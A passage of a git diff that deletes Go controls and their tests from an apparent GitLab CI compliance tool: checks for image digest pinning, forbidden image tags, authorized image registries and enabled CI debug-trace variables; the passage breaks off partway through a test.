- pinned := isImagePinnedByDigest(image.Link)
-
- if p.MustBePinnedByDigest {
- if pinned {
- result.Metrics.PinnedByDigest++
- } else {
- result.Issues = append(result.Issues, GitlabPipelineImageIssueTag{
- Code: CodeImageNotPinnedByDigest,
- DocURL: CodeImageNotPinnedByDigest.DocURL(),
- Link: image.Link,
- Tag: image.Tag,
- Job: image.Job,
- })
- result.Metrics.NotPinnedByDigest++
- }
- }
-
- if len(p.ForbiddenTags) == 0 {
- continue
- }
- // In digest mode, only evaluate forbidden tags when the image is not digest-pinned
- // (avoids ISSUE-102 on references that are already immutable via digest).
- evaluateForbidden := !p.MustBePinnedByDigest || !pinned
- if evaluateForbidden && gitlab.CheckItemMatchToPatterns(image.Tag, p.ForbiddenTags) {
- result.Issues = append(result.Issues, GitlabPipelineImageIssueTag{
- Code: CodeImageForbiddenTag,
- DocURL: CodeImageForbiddenTag.DocURL(),
- Link: image.Link,
- Tag: image.Tag,
- Job: image.Job,
- })
- result.Metrics.UsingForbiddenTags++
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found issues, setting compliance to 0")
- }
-
- // Set metrics
- result.Metrics.Total = uint(len(pipelineImageData.Images))
-
- l.WithFields(logrus.Fields{
- "totalImages": result.Metrics.Total,
- "forbiddenTagCount": result.Metrics.UsingForbiddenTags,
- "notPinnedByDigest": result.Metrics.NotPinnedByDigest,
- "pinnedByDigest": result.Metrics.PinnedByDigest,
- "compliance": result.Compliance,
- }).Info("Forbidden image tag control completed")
-
- return result
-}
-
-/////////////////////////////////
-// Digest pinning utility //
-/////////////////////////////////
-
-// imageDigestPattern matches a valid content digest (e.g., sha256:, sha512:).
-var imageDigestPattern = regexp.MustCompile(`^[A-Za-z][A-Za-z0-9]*(?:[+._-][A-Za-z][A-Za-z0-9]*)*:[0-9a-fA-F]{32,}$`)
-
-// isImagePinnedByDigest checks whether an image reference contains an immutable digest.
-// Returns true for references like "alpine@sha256:abc123..." and false for tag-only
-// references like "alpine:3.19" or "alpine".
-func isImagePinnedByDigest(imageLink string) bool {
- link := strings.TrimSpace(imageLink)
- if link == "" {
- return false
- }
-
- lastAt := strings.LastIndex(link, "@")
- if lastAt <= 0 || lastAt >= len(link)-1 {
- return false
- }
-
- digest := link[lastAt+1:]
- return imageDigestPattern.MatchString(digest)
-}
diff --git a/control/controlGitlabImagePinnedByDigest_test.go b/control/controlGitlabImagePinnedByDigest_test.go
deleted file mode 100644
index 3685c3a..0000000
--- a/control/controlGitlabImagePinnedByDigest_test.go
+++ /dev/null
@@ -1,295 +0,0 @@
-package control
-
-import (
- "slices"
- "strings"
- "testing"
-
- "github.com/getplumber/plumber/collector"
-)
-
-func TestIsImagePinnedByDigest(t *testing.T) {
- sha256Digest := strings.Repeat("a", 64)
- sha512Digest := strings.Repeat("b", 128)
-
- tests := []struct {
- name string
- image string
- want bool
- }{
- {
- name: "digest only",
- image: "docker.io/library/alpine@sha256:" + sha256Digest,
- want: true,
- },
- {
- name: "tag and digest",
- image: "docker.io/library/node:20@sha256:" + sha256Digest,
- want: true,
- },
- {
- name: "sha512 digest",
- image: "registry.example.com/team/app@sha512:" + sha512Digest,
- want: true,
- },
- {
- name: "tag only",
- image: "docker.io/library/alpine:3.19",
- want: false,
- },
- {
- name: "implicit latest",
- image: "docker.io/library/alpine",
- want: false,
- },
- {
- name: "digest variable",
- image: "docker.io/library/alpine@$DIGEST",
- want: false,
- },
- {
- name: "invalid digest format",
- image: "docker.io/library/alpine@sha256:not-a-hex-digest",
- want: false,
- },
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- got := isImagePinnedByDigest(tt.image)
- if got != tt.want {
- t.Fatalf("isImagePinnedByDigest(%q) = %v, want %v", tt.image, got, tt.want)
- }
- })
- }
-}
-
-func TestForbiddenTagsWithMustBePinnedByDigestEnabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
-
- sha256Digest := strings.Repeat("a", 64)
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/alpine@sha256:" + sha256Digest,
- Tag: "",
- Job: "build",
- },
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "test",
- },
- {
- Link: "docker.io/library/golang",
- Tag: "",
- Job: "lint",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatalf("expected control to run, but it was skipped")
- }
- if !result.MustBePinnedByDigest {
- t.Fatalf("expected MustBePinnedByDigest to be true in result")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance to be 0, got %v", result.Compliance)
- }
- if result.Metrics.Total != 3 {
- t.Fatalf("expected total metric to be 3, got %d", result.Metrics.Total)
- }
- if result.Metrics.PinnedByDigest != 1 {
- t.Fatalf("expected pinnedByDigest metric to be 1, got %d", result.Metrics.PinnedByDigest)
- }
- if result.Metrics.NotPinnedByDigest != 2 {
- t.Fatalf("expected notPinnedByDigest metric to be 2, got %d", result.Metrics.NotPinnedByDigest)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
-}
-
-func TestDigestPinningAndForbiddenTagBothReported(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/golangci/golangci-lint:latest",
- Tag: "latest",
- Job: "lint",
- },
- },
- }
-
- result := conf.Run(data)
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues (digest + forbidden tag), got %d", len(result.Issues))
- }
- codes := []ErrorCode{result.Issues[0].Code, result.Issues[1].Code}
- if !slices.Contains(codes, CodeImageNotPinnedByDigest) || !slices.Contains(codes, CodeImageForbiddenTag) {
- t.Fatalf("expected ISSUE-103 and ISSUE-102, got codes %#v", codes)
- }
- if result.Metrics.NotPinnedByDigest != 1 {
- t.Fatalf("expected notPinnedByDigest 1, got %d", result.Metrics.NotPinnedByDigest)
- }
- if result.Metrics.UsingForbiddenTags != 1 {
- t.Fatalf("expected usingForbiddenTags 1, got %d", result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestDigestModePinnedImageWithLatestTagNoForbiddenIssue(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest"},
- MustBePinnedByDigest: true,
- }
- sha := strings.Repeat("a", 64)
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:latest@sha256:" + sha,
- Tag: "latest",
- Job: "build",
- },
- },
- }
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when digest-pinned, got %#v", result.Issues)
- }
- if result.Metrics.PinnedByDigest != 1 || result.Metrics.UsingForbiddenTags != 0 {
- t.Fatalf("metrics: pinned=%d forbidden=%d", result.Metrics.PinnedByDigest, result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestForbiddenTagsWithMustBePinnedByDigestDisabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- ForbiddenTags: []string{"latest", "dev"},
- MustBePinnedByDigest: false,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "build",
- },
- {
- Link: "docker.io/library/alpine:latest",
- Tag: "latest",
- Job: "test",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatalf("expected control to run, but it was skipped")
- }
- if result.MustBePinnedByDigest {
- t.Fatalf("expected MustBePinnedByDigest to be false in result")
- }
- // Only "latest" is forbidden, "20" is fine
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Tag != "latest" {
- t.Fatalf("expected issue tag to be 'latest', got '%s'", result.Issues[0].Tag)
- }
- if result.Metrics.UsingForbiddenTags != 1 {
- t.Fatalf("expected usingForbiddenTags to be 1, got %d", result.Metrics.UsingForbiddenTags)
- }
-}
-
-func TestForbiddenTagsControlDisabled(t *testing.T) {
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: false,
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/node:20",
- Tag: "20",
- Job: "build",
- },
- },
- }
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatalf("expected control to be skipped")
- }
- if result.Compliance != 100 {
- t.Fatalf("expected compliance to remain 100 when skipped, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues when skipped, got %d", len(result.Issues))
- }
-}
-
-func TestMustBePinnedByDigestAllPinned(t *testing.T) {
- sha256Digest := strings.Repeat("a", 64)
- conf := &GitlabImageForbiddenTagsConf{
- Enabled: true,
- MustBePinnedByDigest: true,
- }
-
- data := &collector.GitlabPipelineImageData{
- CiValid: true,
- CiMissing: false,
- Images: []collector.GitlabPipelineImageInfo{
- {
- Link: "docker.io/library/alpine@sha256:" + sha256Digest,
- Tag: "",
- Job: "build",
- },
- {
- Link: "docker.io/library/node:20@sha256:" + sha256Digest,
- Tag: "20",
- Job: "test",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 100 {
- t.Fatalf("expected compliance to be 100 when all pinned, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
- if result.Metrics.PinnedByDigest != 2 {
- t.Fatalf("expected pinnedByDigest to be 2, got %d", result.Metrics.PinnedByDigest)
- }
-}
diff --git a/control/controlGitlabImageUntrusted.go b/control/controlGitlabImageUntrusted.go
deleted file mode 100644
index 960f64c..0000000
--- a/control/controlGitlabImageUntrusted.go
+++ /dev/null
@@ -1,257 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabImageAuthorizedSourcesVersion = "0.1.0"
-
-// Constants for image registry and trust status
-const (
- dockerHubDomain = "docker.io"
- unknownRegistry = "unknown"
- authorizedStatus = "authorized"
- unauthorizedStatus = "unauthorized"
-)
-
-// GitlabImageAuthorizedSourcesConf holds the configuration for image source authorization
-type GitlabImageAuthorizedSourcesConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // TrustedUrls is a list of authorized registry URLs/patterns
- TrustedUrls []string `json:"trustedUrls"`
-
- // TrustDockerHubOfficialImages trusts official Docker Hub images (e.g., nginx, alpine)
- TrustDockerHubOfficialImages bool `json:"trustDockerHubOfficialImages"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabImageAuthorizedSourcesConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- imgConfig := plumberConfig.GetContainerImageMustComeFromAuthorizedSourcesConfig()
- if imgConfig == nil {
- // Control not configured - disable it
- l.Debug("containerImageMustComeFromAuthorizedSources control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- // Check if enabled field is set
- if imgConfig.Enabled == nil {
- return fmt.Errorf("containerImageMustComeFromAuthorizedSources.enabled field is required in .plumber.yaml config file")
- }
-
- // Apply configuration
- p.Enabled = imgConfig.IsEnabled()
- p.TrustedUrls = imgConfig.TrustedUrls
- if imgConfig.TrustDockerHubOfficialImages != nil {
- p.TrustDockerHubOfficialImages = *imgConfig.TrustDockerHubOfficialImages
- }
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "trustedUrls": p.TrustedUrls,
- "trustDockerHubOfficialImages": p.TrustDockerHubOfficialImages,
- }).Debug("containerImageMustComeFromAuthorizedSources control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabImageAuthorizedSourcesMetrics holds metrics about image source authorization
-type GitlabImageAuthorizedSourcesMetrics struct {
- Total uint `json:"total"`
- Authorized uint `json:"authorized"`
- Unauthorized uint `json:"unauthorized"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabImageAuthorizedSourcesResult holds the result of the image authorized sources control
-type GitlabImageAuthorizedSourcesResult struct {
- Issues []GitlabPipelineImageIssueUnauthorized `json:"issues"`
- Metrics GitlabImageAuthorizedSourcesMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineImageIssueUnauthorized represents an issue with an unauthorized image source
-type GitlabPipelineImageIssueUnauthorized struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Link string `json:"link"`
- Status string `json:"status"`
- Job string `json:"job"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// checkImageAuthorizationStatus checks if an image is from an authorized source
-func checkImageAuthorizationStatus(image *collector.GitlabPipelineImageInfo, trustedUrls []string, trustDockerHubOfficialImages bool) string {
- // Check if Docker Hub options are enabled
- isDockerHubOfficial := false
- if trustDockerHubOfficialImages && image.Registry == dockerHubDomain {
- // Check if it's a Docker Hub official image (no username in path)
- // Official images have a single element path (e.g., docker.io/nginx)
- if !strings.Contains(image.Name, "/") {
- isDockerHubOfficial = true
- }
- }
-
- // If no trusted urls in the conf and Docker Hub options don't apply: image is unauthorized
- if len(trustedUrls) == 0 && !isDockerHubOfficial {
- return unauthorizedStatus
- }
-
- // Check if the image url is authorized
- imageUrl := ""
- if image.Registry == unknownRegistry {
- imageUrl = image.Name
- } else {
- imageUrl = image.Registry + "/" + image.Name
- }
-
- // Include tag in the URL for pattern matching (if tag is present)
- if image.Tag != "" {
- imageUrl = imageUrl + ":" + image.Tag
- }
-
- imageUrlSanitized := strings.Trim(imageUrl, "/")
- if imageUrlSanitized == "" {
- return unauthorizedStatus
- }
-
- l.WithFields(logrus.Fields{
- "imageUrlSanitized": imageUrlSanitized,
- "name": image.Name,
- "tag": image.Tag,
- "registry": image.Registry,
- "link": image.Link,
- }).Debug("Checking authorization status of image")
-
- // Normalize variable notations in both the image URL and the trusted URL patterns
- normalizeVarNotation := func(s string) string {
- re := regexp.MustCompile(`\$\{([a-zA-Z_][a-zA-Z0-9_]*)\}`)
- return re.ReplaceAllString(s, `$$$1`)
- }
- imageUrlNormalized := normalizeVarNotation(imageUrlSanitized)
- trustedNormalized := make([]string, 0, len(trustedUrls))
- for _, p := range trustedUrls {
- trustedNormalized = append(trustedNormalized, normalizeVarNotation(p))
- }
-
- // Check if the image is in the authorized URLs list
- if gitlab.CheckItemMatchToPatterns(imageUrlNormalized, trustedNormalized) {
- return authorizedStatus
- }
-
- // If the image is a Docker Hub official image, mark it as authorized
- if isDockerHubOfficial {
- l.WithField("image", image.Name).Debug("Docker Hub official image considered authorized")
- return authorizedStatus
- }
-
- return unauthorizedStatus
-}
-
-// Run executes the image authorized sources control
-func (p *GitlabImageAuthorizedSourcesConf) Run(pipelineImageData *collector.GitlabPipelineImageData) *GitlabImageAuthorizedSourcesResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabImageAuthorizedSources",
- "controlVersion": ControlTypeGitlabImageAuthorizedSourcesVersion,
- })
- l.Info("Start image authorized sources control")
-
- result := &GitlabImageAuthorizedSourcesResult{
- Issues: []GitlabPipelineImageIssueUnauthorized{},
- Metrics: GitlabImageAuthorizedSourcesMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabImageAuthorizedSourcesVersion,
- CiValid: pipelineImageData.CiValid,
- CiMissing: pipelineImageData.CiMissing,
- Skipped: false,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Image authorized sources control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineImageData.CiValid || pipelineImageData.CiMissing {
- result.Compliance = 0.0
- if !pipelineImageData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineImageData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all images to check authorization status
- for _, image := range pipelineImageData.Images {
- status := checkImageAuthorizationStatus(&image, p.TrustedUrls, p.TrustDockerHubOfficialImages)
-
- // Update metrics
- switch status {
- case authorizedStatus:
- result.Metrics.Authorized++
- case unauthorizedStatus:
- result.Metrics.Unauthorized++
- // Add issue for unauthorized images
- issue := GitlabPipelineImageIssueUnauthorized{
- Code: CodeImageUnauthorizedSource,
- DocURL: CodeImageUnauthorizedSource.DocURL(),
- Link: image.Link,
- Status: status,
- Job: image.Job,
- }
- result.Issues = append(result.Issues, issue)
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found unauthorized images, setting compliance to 0")
- }
-
- // Set total metrics
- result.Metrics.Total = uint(len(pipelineImageData.Images))
-
- l.WithFields(logrus.Fields{
- "totalImages": result.Metrics.Total,
- "authorizedCount": result.Metrics.Authorized,
- "unauthorizedCount": result.Metrics.Unauthorized,
- "compliance": result.Compliance,
- }).Info("Image authorized sources control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineDebugTrace.go b/control/controlGitlabPipelineDebugTrace.go
deleted file mode 100644
index c229324..0000000
--- a/control/controlGitlabPipelineDebugTrace.go
+++ /dev/null
@@ -1,224 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineDebugTraceVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineDebugTraceConf holds the configuration for debug trace detection
-type GitlabPipelineDebugTraceConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenVariables is a list of CI/CD variable names that must not be set to "true"
- ForbiddenVariables []string `json:"forbiddenVariables"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineDebugTraceConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- debugTraceConfig := plumberConfig.GetPipelineMustNotEnableDebugTraceConfig()
- if debugTraceConfig == nil {
- l.Debug("pipelineMustNotEnableDebugTrace control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if debugTraceConfig.Enabled == nil {
- return fmt.Errorf("pipelineMustNotEnableDebugTrace.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = debugTraceConfig.IsEnabled()
- p.ForbiddenVariables = debugTraceConfig.ForbiddenVariables
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenVariables": p.ForbiddenVariables,
- }).Debug("pipelineMustNotEnableDebugTrace control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineDebugTraceMetrics holds metrics about debug trace detection
-type GitlabPipelineDebugTraceMetrics struct {
- TotalVariablesChecked uint `json:"totalVariablesChecked"`
- ForbiddenFound uint `json:"forbiddenFound"`
-}
-
-// GitlabPipelineDebugTraceResult holds the result of the debug trace control
-type GitlabPipelineDebugTraceResult struct {
- Issues []GitlabPipelineDebugTraceIssue `json:"issues"`
- Metrics GitlabPipelineDebugTraceMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineDebugTraceIssue represents a forbidden debug variable found in the CI config
-type GitlabPipelineDebugTraceIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- VariableName string `json:"variableName"`
- Value string `json:"value"`
- Location string `json:"location"` // "global" or job name
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the debug trace detection control
-func (p *GitlabPipelineDebugTraceConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineDebugTraceResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineDebugTrace",
- "controlVersion": ControlTypeGitlabPipelineDebugTraceVersion,
- })
- l.Info("Start debug trace detection control")
-
- result := &GitlabPipelineDebugTraceResult{
- Issues: []GitlabPipelineDebugTraceIssue{},
- Metrics: GitlabPipelineDebugTraceMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineDebugTraceVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Debug trace detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.ForbiddenVariables) == 0 {
- l.Info("No forbidden variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- // Use merged conf to check variables after all includes are resolved
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check variables")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build a set of forbidden variable names (case-insensitive)
- forbiddenSet := make(map[string]bool, len(p.ForbiddenVariables))
- for _, v := range p.ForbiddenVariables {
- forbiddenSet[strings.ToUpper(v)] = true
- }
-
- // Check global variables
- globalVars, err := gitlab.ParseGlobalVariables(mergedConf)
- if err != nil {
- l.WithError(err).Warn("Unable to parse global variables")
- } else {
- for key, value := range globalVars {
- result.Metrics.TotalVariablesChecked++
- if forbiddenSet[strings.ToUpper(key)] && isTrueValue(value) {
- result.Issues = append(result.Issues, GitlabPipelineDebugTraceIssue{
- Code: CodeDebugTraceEnabled,
- DocURL: CodeDebugTraceEnabled.DocURL(),
- VariableName: key,
- Value: value,
- Location: "global",
- })
- result.Metrics.ForbiddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": "global",
- }).Debug("Forbidden debug variable found in global variables")
- }
- }
- }
-
- // Check per-job variables
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- jobVars, err := gitlab.ParseJobVariables(job)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job variables, skipping")
- continue
- }
-
- for key, value := range jobVars {
- result.Metrics.TotalVariablesChecked++
- if forbiddenSet[strings.ToUpper(key)] && isTrueValue(value) {
- result.Issues = append(result.Issues, GitlabPipelineDebugTraceIssue{
- Code: CodeDebugTraceEnabled,
- DocURL: CodeDebugTraceEnabled.DocURL(),
- VariableName: key,
- Value: value,
- Location: jobName,
- })
- result.Metrics.ForbiddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": jobName,
- }).Debug("Forbidden debug variable found in job variables")
- }
- }
- }
-
- // Calculate compliance
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Forbidden debug variables found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalChecked": result.Metrics.TotalVariablesChecked,
- "forbiddenFound": result.Metrics.ForbiddenFound,
- "compliance": result.Compliance,
- }).Info("Debug trace detection control completed")
-
- return result
-}
-
-// isTrueValue checks if a variable value is truthy
-// GitLab considers "true", "1", "yes" as truthy for CI_DEBUG_TRACE
-func isTrueValue(value string) bool {
- v := strings.ToLower(strings.TrimSpace(value))
- return v == "true" || v == "1" || v == "yes"
-}
diff --git a/control/controlGitlabPipelineDebugTrace_test.go b/control/controlGitlabPipelineDebugTrace_test.go
deleted file mode 100644
index ac82c1b..0000000
--- a/control/controlGitlabPipelineDebugTrace_test.go
+++ /dev/null
@@ -1,274 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-// helper to build a GitlabPipelineOriginData with global variables and optional jobs
-func buildPipelineOriginDataWithVars(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestDebugTrace_Disabled(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: false,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestDebugTrace_NoForbiddenVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no forbidden variables configured")
- }
-}
-
-func TestDebugTrace_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestDebugTrace_GlobalVarTrue(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.VariableName != "CI_DEBUG_TRACE" {
- t.Fatalf("expected variable CI_DEBUG_TRACE, got %s", issue.VariableName)
- }
- if issue.Location != "global" {
- t.Fatalf("expected location 'global', got %s", issue.Location)
- }
- if result.Metrics.ForbiddenFound != 1 {
- t.Fatalf("expected ForbiddenFound 1, got %d", result.Metrics.ForbiddenFound)
- }
-}
-
-func TestDebugTrace_GlobalVarFalse(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "false"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when value is false, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
-}
-
-func TestDebugTrace_JobVarTrue(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
-
- // Build job content as YAML-like map (how GitlabJobs stores parsed CI jobs)
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "CI_DEBUG_TRACE": "true",
- },
- }
- data := buildPipelineOriginDataWithVars(
- nil,
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Location != "build" {
- t.Fatalf("expected location 'build', got %s", result.Issues[0].Location)
- }
-}
-
-func TestDebugTrace_MultipleVarsGlobalAndJob(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo test",
- "variables": map[interface{}]interface{}{
- "CI_DEBUG_SERVICES": "true",
- },
- }
- data := buildPipelineOriginDataWithVars(
